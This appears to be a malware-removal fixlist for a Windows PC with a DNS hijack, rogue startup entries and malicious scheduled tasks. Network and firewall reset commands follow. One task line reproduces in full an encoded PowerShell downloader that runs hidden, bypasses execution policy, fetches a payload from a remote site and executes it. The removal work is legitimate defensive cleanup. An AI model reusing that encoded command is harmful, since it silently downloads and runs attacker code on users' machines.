CreateRestorePoint: 
HKU\S-1-5-21-4067499190-4158452651-832932472-1001\...\Run: [grint] => C:\ProgramData\grint.exe [15127440 2015-08-31] ()
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
CHR HKU\S-1-5-21-4067499190-4158452651-832932472-1001\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Tcpip\Parameters: [NameServer]  95.211.158.130
Tcpip\..\Interfaces\{89F9461E-DE3F-4C87-9154-D45861FF413D}: [NameServer]  95.211.158.130
Tcpip\..\Interfaces\{96809188-F85C-4950-ACEC-9F47446A34D7}: [NameServer]  95.211.158.130
Tcpip\..\Interfaces\{EF22C593-8E82-4C8B-BCC1-3D971D1DDFE1}: [NameServer]  95.211.158.130
Tcpip\..\Interfaces\{F941A1CB-FD6F-4471-B40D-CACDD34D0A3A}: [NameServer]  95.211.158.130
2015-12-28 19:41 - 2015-12-28 19:41 - 00019370 _____ C:\windows\System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF}
2015-12-28 19:41 - 2015-12-28 19:41 - 00000000 ____D C:\ProgramData\{1e0eec9d-6064-0}
2015-12-28 19:41 - 2015-12-28 19:41 - 00000000 ____D C:\ProgramData\{1966dac7-1064-1}
2014-12-28 17:10 - 2015-01-06 17:51 - 0001014 _____ () C:\Users\archer\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat
2015-09-20 19:04 - 2015-09-20 19:04 - 2696318 _____ () C:\ProgramData\8X4gFnnipSHGg.exe
2015-09-04 18:54 - 2015-08-31 13:53 - 15127440 ___SH () C:\ProgramData\grint.exe
Task: {EF83657C-EF9E-4218-82A9-05747B10DB28} - System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAcABvAHIAdABuAGUAdwAuAG4AZQB0AC8AdQAvAD8AcQA9AG4AaQB3AGQASQBjAGMANgBkAHUAYwB3ADAATwBQAEcAeAA1AGcAYgA3AHIAdwBaAFgARgBYAEoAMABMAHYAbwBDAHEAWgA0AE8AQgBNAFMAeABtAEQAawBuAGYAZABUAHQAZwBwAG0AYwBIAGkAawB5AFgAVABQAGEAMwBMAFMAcQBpAHEAUwBLAGMATgBJAFAAUwBvAC0AYwBZADkALQBEAEMAUgBCAFgAawBmAHUARABWAGgAQwBSAGQAUgBLAHMASgA0AGsAZAAzAHQAVgBYADcAVAA5AHIAMgA3AGkAVgBXADIASgBlAFAAOQBFAFIANQBKAGgATQB5AGcASABoAHcATgBQAEkANgBfAEgANQBFAEgAcwBrAFIAUQBCAGcAdQBmADgATgBZAEcATABYAFYATQBMAHoAQQA5AFcAagBlAGwASwB2AGwANgBqAGwAQgBaAGgAcABVADEAOAB6ADIAZwByAEYASABXAFMAOAB6AGEASgB0AHgAUgB4AEQAZwBzAHMAcABNAEIAVwAxAEcAUQBCAEQANwBMADAAMABIAE8AUgBXAHcAbQBxAFEAZgBuAE0AbgBvAEQATwBDAEgAdQBzAHIAawBlAGwAQgBLAFUAaQBxAEkAMwBaAFoAeABUAHQAUwBNAE8AZgBvAGEAWgB2AEQAaQBZAGcASwAzAFgAWgBMAG8ARgBDAFMAYgAzADYAcAAtAG4AQwBIAGwAYQBsADQAMQBRAEgAbQBwAGcAWgB2AGkAQgByAGIANQBLAGkAVgBZAFcARQBqADkASwBYAG0ANQBJAHAAWABYAFEAWABhAEQANwBtAGwAQQB6AGkANwBYAE0AWQB3AEYAdQB2AGcAYwBvAHYAOABWAHYAUQBLAEYAUgB3AE4AbQBOAEoAdQBFAEYANgBhADQAOAAyAHUASQBVAFkASgAtAEMAcQBWAEwARgAxADcATwBuAG8AbABRAEcAWgBTAF8ARwBkAHIAQgBfAFkAbgAxAHkAVgBuAGcAVgBuADMAcABvAHMAbwBOADMAegB0AGoAdwA3AG4ASQA4AE4AMwB3AHEANQBmAHAAaQBZAGMANwA5AEgAXwBWAFcAcAA4AE0ANgBnAEUAOAB2ADIAQwBCAFYAUwBLAGQANwBhAHEAcAA2AGQAdgBBAG0ANABsAGQAWgA0AHkAMgBPADMAcwA5AFQAVABkAFAAaQBXADcAQQBzAF8ANAAyAEUAcABtAHUAUwBHAEQAcgAmAGMAPQBvAHEAegB3AFQAOABoADgAMAB0AG4ARgBQAFQAawBxAFIAQwBCAHkAVQB1AE4AegA3AHIAOQB6AEgAVwBVAG4ANAA3AFEAZAA5AF8ANQBNAEoASwBxAGcAQwBOAGgAQwBUAEsARABXADkAcQBnAEIAdQBjAHIAeQBvAC0AZwBIAEwAeAA0AGsASwBNAEQAUQBxAGsAdwBQAHgATwA5AGsAWAA3AHEATgBUAGMASABvAEQAeABNAC0AdwBtAFIATQBNAHYATQA5AGoAZABwAHEASQBFAHUATABJAHMALQBaAFQAUABCAGsAZwBkAFMAYwBZAG8AbQB3AF8AeABXAFkAMgBHAHoATwBqAEEAeABkADkANwBHAEwAZgBOAGkARgB6AEgAUABwAGcAVQBLAGEANQBoAEgAMAA5AHUAegBLAEgAXwBWAGIALQBYAHEARwBJAGYANgBLAFIAXwA1AGoANwBBADUAQgBOAEIAUgBtAGUAVgBtADIAWAAtAEcAawBPAHIAWQBOAHcAbwA1AFAASwB4AEwAaABHAEgAMQAzADAANwBHAEcAbQBZAE4AWgBEAGUATwBFAFkARQBkAGEAdQB1ADUAcAB0AGYALQBkAEUAYQBRAFgAeQB1AHMAVQBIAHoATgBKAGMANgBDAGQASQBZAEEASABrAEYAZABxAGcANQA1AFkAbQBGADUAWQBsAHgAaQBYAGQANgBwADgAWgBKAEsAUgBtAEgAYQBZAFQAMQA5AFkAMAB1AFAAawBVAEcAaQBRAG4ASgBCAFEAbQBOADkALQA3AEsASgA0AHUANgB4AEcARgBZAC0AMwBUAEMAbQB3AEYAVwAxAGsAWABiAG4ASQBPAGYAQwBoAHkAQwBGADkAcABzAFIAOABpADgASwAyAC0AawBxADcAYgBjAFIAdwBPADAARgBpAGMAaQBtAF8ATgAxAEQAMQBZAEgAUQAwAEMARwBPAE4ASwBXAGUAZQB2AEQAOABOAG4AbABSAHIAZwBBAFQAUwBGAFMAeQB5ADgAcAB5AFcAMwBaAF8AVABBAEkANgA1ADEANwB3AGYAQQA1AEUAdQBiAGIAVQA0AEEASwBnAGQAaQBuAFoATwBTAE4AegAtAHkAeQAyADEAeQA1AEMANAA0AHAAagBuADIAVQBCAE4AZwBiAGgAbwA1AG0ASQA1AHoAaABjAGYAYQA4AGMAbAB2AHYAagB0ADkANgBlAGYAbgBvAEQATQBLAFAAMgBlAG0AagBPAEgANgB0AGwAZABFAF8AawA5ADkARwAtAE0AdwBJAEEAaABoAGMAYgA3AE0ANwA5AFIANABPADkASwBSAFUAZgBtAFIAUABQAGsAdQBlAFgANgBMADIAUAB0ADcAMQBVADAAaABpAEMANwBhAFYASQBPAGMAaQBEAG8AdQBsAHgAcwBUAFcAMAB2ADcAcwBDAHQAcQBkAG8AWAB6AEUARwBPAHUATABtAEMAVwBkAHoAWgBaAFcAbwBJAEQASwB3ADYATABNAEUAQQA2ADkAMwBCAFMAaQBiAHMAbwBaAFIAcABrAG4AVQA2AG0AZgBXAFIAVQBZAFQAXwBQAHUAMwAzAHoAQgB6ADIAVAB5AGcAcwBRAGUAVAByAEwAcABSAG4AZQBJAFkASgBRAFkAYgBBAEcAYwBpAGQAcAA3ADAAbQBnADQAbABPAGwANABLAFIAVQBmADcAMABjAGYANQBNAGgARABRAEYAYwBiAHEAQQBEAEgALQBrAFAAZQBDAE0AVgBXAEsAbQBqAFgAJgByAD0ANQA5ADgANwA2ADUAMAA3ADcANgA2ADMAOAAxADMANgA5ADQANgAiADsAJABzAHQAcwBrAD0AIgB7ADQAOQAxAEEANgBEAEMAQgAtADIARQAxAEUALQBBAEMAQwBGAC0AOAAxADMARQAtADYANwA4AEUAMAA2ADkAMQAwAEMAQQBGAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B} - System32\Tasks\VoiceBook => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION
Task: {3959C21C-7347-4BD6-9B0B-E53839FFF249} - \Superclean -> No File <==== ATTENTION
Task: C:\windows\Tasks\VoiceBook.job => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION
c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
RemoveProxy:
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON 
CMD: ipconfig /flushdns 
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt 
CMD: ipconfig /release
CMD: ipconfig /renew 
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp: 
CMD: bitsadmin /reset /allusers